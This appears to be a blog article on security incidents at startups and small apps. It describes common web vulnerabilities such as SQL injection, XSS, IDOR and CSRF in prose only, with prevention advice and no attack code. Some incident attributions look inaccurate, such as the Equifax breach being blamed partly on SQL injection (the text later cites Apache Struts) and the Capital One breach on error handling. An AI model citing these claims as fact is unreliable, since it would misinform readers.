In the world of tech startups, speed often wins over everything. Teams focus on shipping new features, growing the user base, and impressing investors. Security? It’s often an afterthought—until something goes wrong.
Here are real examples of security incidents involving small web and mobile apps, and how they could’ve been prevented by embedding security practices early on.
Feeld Dating App – Sensitive User Data Exposure (2024)
Feeld, a UK-based dating app designed for people exploring alternative relationships, faced a serious security incident in 2024. Researchers discovered vulnerabilities that could’ve exposed private user data, including photos, messages, and sensitive relationship details.
Feeld fixed the issues within two months, but the situation highlighted how easily personal data could have been accessed.
How this could’ve been avoided:
- Implement proper authorization checks: Sensitive content should always be protected by strict access controls and verified user permissions.
- Conduct regular security audits and bug bounty programs: Feeld eventually committed to working with ethical hackers—this should’ve happened before the exposure.
Zapier – Code Repository Breach (2025)
Zapier, a well-known automation platform, experienced unauthorized access to its internal code repositories. Customer data unintentionally copied into debugging logs was potentially exposed. The breach occurred due to a misconfiguration of two-factor authentication (2FA) on an employee account.
How this could’ve been avoided:
- Enforce mandatory 2FA on all critical accounts: Especially for developer tools and admin access, 2FA should be non-optional and verified regularly.
- Avoid storing sensitive customer data in code repositories: Debug logs and development environments should never contain production user data.
Confidant Health – Therapy Session Data Exposure (2024)
A database belonging to Confidant Health, a telehealth startup, was left unsecured and publicly accessible. This leak exposed over 1.7 million activity logs and sensitive audio/video recordings of therapy sessions.
How this could’ve been avoided:
- Configure strict database access policies: Publicly accessible databases are almost always misconfigurations. Always apply IP restrictions, authentication, and network segmentation.
- Implement automated infrastructure security scans: Tools can continuously check for misconfigured storage buckets or databases.
MOVEit Software Breach – Massive Supply Chain Attack (2023)
While not a startup itself, the MOVEit breach affected thousands of organizations, many of them small startups using third-party software without reviewing its security posture. A vulnerability in MOVEit’s software enabled attackers to steal sensitive files via SQL injection.
How this could’ve been avoided (from a startup’s perspective):
- Assess third-party software risks: Startups should perform due diligence when integrating external platforms and regularly monitor vulnerability disclosures.
- Apply zero-trust principles and isolate critical systems: Even trusted third-party services should have minimal access to sensitive data.
SQL Injection
When user input isn’t properly sanitized before using it in database queries, attackers can inject malicious SQL commands. This can lead to unauthorized data access, complete database deletion, or even server compromise. In 2017, the Equifax breach exposed 147 million customers’ personal data due partly to SQL injection vulnerabilities. Even small apps aren’t immune—a local restaurant’s ordering system was compromised through SQL injection, leaking customers’ credit card information.
Cross-Site Scripting (XSS)
This occurs when your app displays unvalidated user input. Attackers inject malicious JavaScript that executes in other users’ browsers. In 2014, eBay had an XSS vulnerability that allowed attackers to create legitimate-looking listings containing malicious JavaScript. On a smaller scale, an indie game developer’s community forum was compromised when attackers injected scripts into profile descriptions that stole other users’ login credentials.
Broken Authentication
Flaws in login systems are extremely common in new applications. The 2018 Panera Bread website leak exposed millions of customer records because the site didn’t properly authenticate API requests for customer data. In another case, a small fitness tracking app had no brute force protection, allowing attackers to systematically guess passwords and access users’ health data and running routes.
Insecure Direct Object References (IDOR)
This happens when your app accesses objects based on user-supplied input without proper authorization checks. In 2021, a major dating app had an IDOR vulnerability that allowed accessing other users’ location data by simply changing ID numbers in API requests. A similar issue affected a portfolio site for photographers where changing the image ID in the URL revealed private commissioned work that wasn’t meant to be public.
Cross-Site Request Forgery (CSRF)
These attacks trick authenticated users into performing unwanted actions without their knowledge. In 2018, cryptocurrency exchange platform Coinbase patched a vulnerability that could have allowed attackers to drain users’ accounts through CSRF. A smaller example involved a self-published author’s website where an attacker created a malicious page that, when visited by the admin while logged in, changed book prices to $0.
Missing Rate Limiting
Without limits on how frequently actions can be performed, attackers can abuse your systems. In 2020, Zoom faced criticism for allowing unlimited password attempts without lockouts, enabling credential stuffing attacks. A small business’s appointment booking system was overwhelmed when a competitor used automated tools to book and immediately cancel hundreds of fake appointments, preventing legitimate customers from scheduling.
Exposed Secrets and API Keys
In 2024, researchers found over 3 million GitHub repositories leaking API keys and other secrets. The consequences are real: one indie game developer accidentally exposed their AWS keys in a public repository, resulting in cryptocurrency miners being deployed on their account, generating thousands of dollars in unexpected charges in just 24 hours.
Outdated Dependencies
The massive 2017 Equifax breach affected 147 million people and resulted from failing to patch a known vulnerability in Apache Struts. On a smaller scale, a local nonprofit’s donation page was compromised because it used an outdated version of a payment processing library with a known vulnerability, resulting in donations being redirected to fraudulent accounts.
Improper Error Handling
The 2019 Capital One breach exposed data of over 100 million customers partially due to misconfigured error handling that revealed too much information. A small e-commerce site for handmade goods unintentionally leaked customer shipping addresses through detailed error messages when order processing failed.
Lack of HTTPS
In 2017, all Starbucks user accounts were potentially exposed when their website failed to use HTTPS for login forms. A local music teacher’s student portal transmitted lesson recordings and payment information without encryption, allowing a malicious actor at the same coffee shop to intercept student data and payment details.
Remember, you don’t need to be a security expert to avoid these issues. Using modern frameworks with built-in protections, keeping dependencies updated, and following basic security practices will help keep your creative projects safe from the most common attacks.